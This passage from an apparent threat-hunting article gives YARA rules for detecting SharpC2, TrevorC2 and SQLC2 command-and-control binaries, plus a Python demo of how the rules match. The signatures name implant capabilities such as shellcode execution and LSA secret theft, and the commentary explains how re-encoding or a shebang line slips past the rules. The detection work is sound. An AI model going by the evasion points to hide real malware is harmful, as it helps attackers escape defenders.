      $s15 = "  - Installing .NET prerequisites might help resolve this problem." fullword wide
      $s16 = "  - https://aka.ms/dotnet-core-applaunch?" fullword wide
      $s17 = "Bundle header version compatibility check failed." fullword wide
      $s18 = "Failed to load the dll from [%s], HRESULT: 0x%X" fullword wide
      $s19 = "The required library %s does not support relative app dll paths." fullword wide
      $s20 = "Call to IsWow64Process2 failed: %u" fullword wide
   condition:
      hash.sha256(0, filesize) == "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63" or
      pe.sections[4].name == "_RDATA" and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("shell32.dll", "ShellExecuteW") and
      pe.imports("kernel32.dll", "IsDebuggerPresent") and
      pe.imports("kernel32.dll", "FindFirstFileExW") and
      uint16(0) == 0x5a4d and filesize < 500KB and
      8 of them
}

rule SharpC2Dll {
   meta:
      description = "SharpC2 - SharpC2.dll"
      sha256 = "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f"
   strings:
      $s1  = "SharpC2.dll" fullword wide
      $s2  = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardCreated>d__7" fullword ascii
      $s3  = "AClient.Components.Pivots.ReversePortForwardTable+<AddForward>d__5" fullword ascii
      $s4  = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardDeleted>d__6" fullword ascii
      $s5  = "DClient.Components.Pivots.ReversePortForwardTable+<DeleteForward>d__9" fullword ascii
      $s6  = "HClient.Components.Pivots.ReversePortForwardTable+<OpenCreateForward>d__8" fullword ascii
      $s7  = "__Blazor.Client.Components.Tasks.ProcessListing" fullword ascii
      $s8  = "C:\\Tools\\SharpC2\\Client\\obj\\Release\\net7.0-windows10.0.19041.0\\win10-x64\\SharpC2.pdb" fullword ascii
      $s9  = "IClient.Components.Pivots.ReversePortForwardTable+<OnInitializedAsync>d__4" fullword ascii
      $s10 = "KClient.Components.Pivots.CreateReversePortForward+<OnInitializedAsync>d__12" fullword ascii
      $s11 = "7Client.Components.Handlers.HostAFile+<UploadFiles>d__22" fullword ascii
      $s12 = "SHELLCODE" fullword wide
      $s13 = "Microsoft.ui.xaml.dll" fullword ascii
      $s14 = "0Client.Services.SharpC2Api+<GetHostedFiles>d__26" fullword ascii
      $s15 = "8Client.Services.SharpC2Api+<GetReversePortForwards>d__42" fullword ascii
      $s16 = "7Client.Services.SharpC2Api+<GetReversePortForward>d__43" fullword ascii
      $s17 = "__Blazor.Client.Components.Pivots.CreateReversePortForward" fullword ascii
      $s18 = ";Client.Components.Handlers.HttpHandlers+<OpenHostFile>d__10" fullword ascii
      $s19 = "9Client.Components.Events.WebLogs+<OnInitializedAsync>d__3" fullword ascii
      $s20 = "__Blazor.Client.Components.Pivots.ReversePortForwardTable" fullword ascii
      $s21 = "MemoryStream" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f" or
      uint16(0) == 0x5a4d and filesize < 2000KB and
      8 of them
}

rule SharpC2_API {
   meta:
      description = "SharpC2 - SharpC2.API.dll"
      sha256 = "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839"
   strings:
      $s1  = "SharpC2.API.dll" fullword wide
      $s2  = "C:\\Tools\\SharpC2\\SharpC2.API\\obj\\Release\\netstandard2.0\\SharpC2.API.pdb" fullword ascii
      $s3  = "get_PayloadType" fullword ascii
      $s4  = "get_ForwardPort" fullword ascii
      $s5  = "Payloads" fullword ascii
      $s6  = "get_BindPort" fullword ascii
      $s7  = "get_ForwardHost" fullword ascii
      $s8  = "<PayloadType>k__BackingField" fullword ascii
      $s9  = "set_PayloadType" fullword ascii
      $s10 = "/api/v1/payloads" fullword wide
      $s11 = "ReversePortForwardRequest" fullword ascii
      $s12 = "<ForwardPort>k__BackingField" fullword ascii
      $s13 = "get_ConnectAddress" fullword ascii
      $s14 = "ReversePortForwardResponse" fullword ascii
      $s15 = "get_ConnectPort" fullword ascii
      $s16 = "get_SourceAddress" fullword ascii
      $s17 = "set_ForwardPort" fullword ascii
      $s18 = "set_PipeName" fullword ascii
      $s19 = "SharpC2.API.Requests" fullword ascii
      $s20 = "SharpC2.API.Responses" fullword ascii
   condition:
      hash.sha256(0, filesize) == "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839" or
      uint16(0) == 0x5a4d and filesize < 100KB and
      8 of them
}


- Trevor C2

import "pe"
import "hash"

rule TrevorC2_Win {
   meta:
      description = "TrevorC2 - tc2_client.exe"
      sha256 = "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978"
   strings:
      $s1  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s2  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s3  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s4  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s5  = "magic_hostname=%s" fullword ascii
      $s6  = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" fullword ascii
      $s7  = "%s?%s%s" fullword ascii
      $s8  = "<!-- oldcss=" fullword ascii
      $s9  = "killnow" fullword ascii
      $s10 = "sessionid=" fullword ascii
      $s11 = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s12 = "Cookie: sessionid=%s" fullword ascii
      $s13 = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ascii
      $s15 = "192.168.1.175" fullword ascii
      $s16 = "connect" fullword ascii
      $s17 = "socket" fullword ascii
      $s18 = ":MZuYHcB<H" fullword ascii
      $s19 = "=UUUUw" fullword ascii
      $s20 = "ATUWVSHcY" fullword ascii
   condition:
      hash.sha256(0, filesize) == "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978" or
      pe.imports("ws2_32.dll", "send") and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("msvcrt.dll", "rand") and
      pe.imports("kernel32.dll", "VirtualQuery") and
      uint16(0) == 0x5a4d and filesize < 200KB and
      8 of them
}

rule TrevorC2_UNIX {
   meta:
      description = "TrevorC2 - tc2_client.out"
      sha256 = "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127"
   strings:
      $s1  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s2  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s3  = "magic_hostname=%s" fullword ascii
      $s4  = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" fullword ascii
      $s5  = "%s?%s%s" fullword ascii
      $s6  = "<!-- oldcss=" fullword ascii
      $s7  = "killnow" fullword ascii
      $s8  = "sessionid=" fullword ascii
      $s9  = "Cookie: sessionid=%s" fullword ascii
      $s10 = ".note.gnu.build-id" fullword ascii
      $s11 = ".note.gnu.property" fullword ascii
      $s12 = ".note.ABI-tag" fullword ascii
      $s13 = ".eh_frame_hdr" fullword ascii
      $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ascii
      $s15 = "192.168.1.175" fullword ascii
      $s16 = "connect" fullword ascii
      $s17 = "socket" fullword ascii
      $s18 = "Accept: text/html" fullword ascii
      $s19 = "_ITM_deregisterTMCloneTable" fullword ascii
      $s20 = "libc.so.6" fullword ascii
   condition:
      hash.sha256(0, filesize) == "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127" or
      uint16(0) == 0x457f and filesize < 80KB and
      8 of them
}


- SQLC2

import "pe"
import "hash"

rule Sqlc2cmds {
   meta:
      description = "Sqlc2cmds - sqlc2cmds.dll"
      sha256 = "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a"
   strings:
      $x1  = "C:\\Windows\\System32\\cmd.exe" fullword wide
      $s2  = "sqlc2cmds.dll" fullword wide
      $s3  = "WMI command executed" fullword wide
      $s4  = "\\\\127.0.0.1\\root\\cimv2:Win32_Process" fullword wide
      $s5  = "base64EncodedPayload" fullword ascii
      $s6  = "run_shellcode" fullword ascii
      $s7  = "run_command" fullword ascii
      $s8  = "run_command_ps" fullword ascii
      $s9  = "run_command_wmi" fullword ascii
      $s10 = "run_getusercon" fullword ascii
      $s11 = "send_http_get" fullword ascii
      $s12 = "execTsql" fullword ascii
      $s13 = "get_lsa_secrets" fullword ascii
      $s14 = "send_http_post" fullword ascii
      $s15 = "run_getprocs" fullword ascii
      $s16 = "entriesread" fullword ascii
      $s17 = "read_file_bin" fullword ascii
      $s18 = "fileContent" fullword ascii
      $s19 = "OriginatingHost" fullword ascii
      $s20 = "PostRequest" fullword ascii
   condition:
      hash.sha256(0, filesize) == "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a" or
      uint16(0) == 0x5a4d and filesize < 40KB and
      1 of ($x*) and 4 of them
}
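Every file-based rule above shares one condition shape: `hash.sha256(0, filesize) == "..." or uint16(0) == <magic> and filesize < <N>KB and <k> of them`. The following Python is an added illustration, not part of Resecurity's rule set and not a substitute for the yara engine: it re-implements that shape (the little-endian `uint16(0)` header check, the `fullword` and `wide` string modifiers, and the `k of them` count) so the rules' mechanics can be exercised offline. The strings loaded into it are a subset copied from RedditC2_ImplantUNIX; the script they are matched against is constructed here and is not the RedditC2 implant.

```python
# Added illustration, not part of the Resecurity rule set: a minimal
# re-implementation of the condition shape shared by the rules above,
#     uint16(0) == <magic> and filesize < <N>KB and <k> of them
# so the little-endian header check, the 'fullword'/'wide' modifiers and
# the 'k of them' count can be exercised without yara-python.  The
# hash.sha256() branch is omitted: it only matches the reference file.
import base64
import re
import struct
from dataclasses import dataclass
from typing import List

ALNUM = rb"[A-Za-z0-9]"  # 'fullword' means no alphanumeric on either side


@dataclass
class YString:
    ident: str              # "$s1", "$x1", ...
    text: str
    wide: bool = False      # 'wide': match the UTF-16LE encoding
    fullword: bool = False

    def pattern(self) -> bytes:
        if self.wide:  # a wide neighbour is <alnum><NUL>, so look two bytes out
            body = re.escape(self.text.encode("utf-16-le"))
            before, after = rb"(?<!" + ALNUM + rb"\x00)", rb"(?!" + ALNUM + rb"\x00)"
        else:
            body = re.escape(self.text.encode("ascii"))
            before, after = rb"(?<!" + ALNUM + rb")", rb"(?!" + ALNUM + rb")"
        return before + body + after if self.fullword else body


@dataclass
class Rule:
    name: str
    strings: List[YString]
    magic: int         # compared with uint16(0)
    max_size: int      # 'filesize < max_size', in bytes
    min_matches: int   # 'k of them'


def uint16(data: bytes, offset: int = 0) -> int:
    """YARA's uint16() is little-endian: b'MZ' -> 0x5a4d, b'\\x7fELF' -> 0x457f,
    b'import' -> 0x6d69, b'function' -> 0x7566."""
    return struct.unpack_from("<H", data, offset)[0]


def b64_magic(prefix: bytes) -> int:
    """Header value of a base64-encoded file: an MZ header encodes to 'TVqQ...',
    which is where PoshC2_Shellcode's 0x5654 comes from."""
    return uint16(base64.b64encode(prefix))


def matched_strings(rule: Rule, data: bytes) -> List[str]:
    """Identifiers that occur at least once.  Two identifiers with identical
    content (e.g. $s1/$s2 in TrevorC2_Win) count twice, as they do in YARA."""
    return [s.ident for s in rule.strings if re.search(s.pattern(), data)]


def evaluate(rule: Rule, data: bytes) -> bool:
    """The 'uint16(0) == magic and filesize < N and k of them' branch."""
    if len(data) < 2 or uint16(data) != rule.magic or len(data) >= rule.max_size:
        return False
    return len(matched_strings(rule, data)) >= rule.min_matches


# Strings copied from RedditC2_ImplantUNIX above (a subset); 0x6d69 is "im"
# of the leading "import", which is why a shebang line defeats the rule.
REDDITC2_IMPLANT = Rule("RedditC2_ImplantUNIX", [
    YString("$s1", "    listener_session = subprocess.getoutput('hostname')", fullword=True),
    YString("$s4", "    output = subprocess.getoutput(command)", fullword=True),
    YString("$s6", "def runTask(command):", fullword=True),
    YString("$s8", "def decrypt(encoded_text, key):", fullword=True),
    YString("$s11", "        self.processed_comments = []", fullword=True),
    YString("$s12", '        if(command[:8] == "download"):', fullword=True),
    YString("$s14", "def encrypt(plaintext, key):", fullword=True),
    YString("$s15", "def xor_encrypt(plaintext, key):", fullword=True),
    YString("$s20", "            output = runTask(command)", fullword=True),
], magic=0x6d69, max_size=20 * 1024, min_matches=8)

# Constructed look-alike script (not the RedditC2 implant) hitting 8 of 9.
SAMPLE = b"""import subprocess

def xor_encrypt(plaintext, key):
    return bytes(c ^ k for c, k in zip(plaintext, key))

def encrypt(plaintext, key):
    return xor_encrypt(plaintext, key)

def decrypt(encoded_text, key):
    return xor_encrypt(encoded_text, key)

def runTask(command):
    output = subprocess.getoutput(command)
    return output

class Implant:
    def __init__(self):
        self.processed_comments = []

    def handle(self, command):
        if(command[:8] == "download"):
            return None
        else:
            output = runTask(command)
            return output
"""

if __name__ == "__main__":
    print(matched_strings(REDDITC2_IMPLANT, SAMPLE))                         # 8 identifiers
    print(evaluate(REDDITC2_IMPLANT, SAMPLE))                                # True
    print(evaluate(REDDITC2_IMPLANT, b"#!/usr/bin/env python3\n" + SAMPLE))  # False
    print(hex(b64_magic(b"MZ\x90\x00")))                                     # 0x5654
```

Three practical points fall out of running it. The `uint16(0)` guard is what keeps these rules cheap, but it is also the easiest thing to break: the same implant saved with a shebang line, or a PE re-encoded to base64, no longer starts with the expected two bytes and the whole `and` chain fails, leaving only the exact-hash branch. Second, `k of them` counts identifiers, not distinct contents, so the duplicated strings in several rules (`$s1`/`$s2` in TrevorC2_Win, `$s2`/`$s3` in PoshC2_Shellcode, `$s13`/`$s16` in RedditC2_ImplantUNIX) each contribute two toward the threshold. Third, most of the strings in SharpC2Exe come from the generic .NET apphost rather than from SharpC2 itself (only `$s4`, `SharpC2.dll`, is framework-specific), so hits from that rule deserve a second look before they are treated as a confirmed C2 artifact.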


Conclusion

This educational material was created to assist network defenders and incident responders in developing methodologies for detecting C2 activity based on popular frameworks. Beyond red teaming, C2 frameworks are widely used by adversaries in the post-exploitation stage, where, in practice, the actor prefers to minimize network communications and to avoid loading modules that could be detected by signatures.

This tendency creates a real challenge for detection. Adversaries are well aware of both signature-based and behavior-based detection methods (including those aimed at fileless tradecraft) and continuously design new TTPs to bypass and evade them. The rules above are anchored on header bytes, file-size caps and string counts from stock builds of each framework, so a recompiled, re-encoded or string-stripped payload will require them to be retuned.

Happy hunting!

References

- The C2 Matrix
https://howto.thec2matrix.com/

- MITRE ATT&CK (Command and Control)
https://attack.mitre.org/tactics/TA0011/
